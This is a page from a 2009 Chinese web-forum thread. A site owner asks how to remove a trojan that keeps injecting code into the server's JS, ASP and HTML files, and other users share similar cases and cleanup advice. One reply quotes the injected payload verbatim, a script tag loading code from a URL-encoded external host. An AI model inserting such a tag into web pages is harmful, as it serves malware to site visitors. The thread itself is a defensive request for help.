123   2  /  3  页   跳转

[原创] 网站被植入Suspicious.ShellCode.Exploit!急救!

回复:网站被植入Suspicious.ShellCode.Exploit!急救!

<script src=http://%63%63%6B%31%2E%63%6E></script>
gototop
 

回复: 网站被植入Suspicious.ShellCode.Exploit!急救!

1.这是个什么木马,服务器是怎么被感染的,如何驱除这个木马,并把自动植入的那些代码删除?
2.我的服务器数据文件里,我发现是JS\ASP\HTM\HTML 这四种类型的文件遭了.有一款软件<文本替换专家>可以清楚,不用开始,一个个文件的去查,再删除(累死人了),但隔几个小时后又会有.而且我准备将数据拷出来再把服务器硬盘格式化重装系统,却发现数据文件的权限全被删除了,根本无法拷贝出来,只有把文件权限更改后才可以,但是改了文件夹的权限,里面的文件权限还是没有,又必须把一个个文件的权限全部改后,才可以,昨天我花了1天时间才改完,才拷贝出来.希望大家有什么好的方法,其他人要警惕,一旦出现我这样的情况,可就遭了..
3.欢迎高手指导,和同类之人交流 QQ交流群6658539
最后编辑阳光芳草 最后编辑于 2009-02-24 12:23:12
gototop
 

回复: 网站被植入Suspicious.ShellCode.Exploit!急救!

继续
3.有人说是微软IE7漏洞造成的,难道是服务器的IE造成的?一般服务器可很少上网啊,我们都是远程管理.这个木马存于何处?如何才能干掉?
gototop
 

回复:网站被植入Suspicious.ShellCode.Exploit!急救!

我从服务器上烤下来的数据,放在本地移动硬盘上,目前又没发现再自动植入代码了!难道该木马是存在于服务器硬盘上的?
gototop
 

回复:网站被植入Suspicious.ShellCode.Exploit!急救!

是这个么?瑞星发布红色安全警报:IE7新漏洞致木马暴增
http://tech.qq.com/a/20090220/000244.htm
gototop
 

回复:网站被植入Suspicious.ShellCode.Exploit!急救!

我的网站出现的问题跟楼主一模一样,请问怎么处理?
www.zhusiliao.com
gototop
 

回复:网站被植入Suspicious.ShellCode.Exploit!急救!

大家赶快来参与啊!
gototop
 

回复: 网站被植入Suspicious.ShellCode.Exploit!急救!



引用:
原帖由 tole 于 2009-2-23 9:56:00 发表
我的网站出现的问题跟楼主一模一样,请问怎么处理?
www.zhusiliao.com


如果你是管理员,仔细查找代码,去掉挂马。
gototop
 

回复:网站被植入Suspicious.ShellCode.Exploit!急救!

楼上的,问题就在这里,把代码祛除了,第二天又有了,就如治病,没有找到病灶啊,只是治标。本在于找出该木马程序,然后删除
gototop
 

回复:网站被植入Suspicious.ShellCode.Exploit!急救!

修复系统漏洞,去掉共享,断网杀毒。如还有异常,就去反病毒区扫描日志分析。
gototop
 
123   2  /  3  页   跳转
页面顶部
Powered by Discuz!NT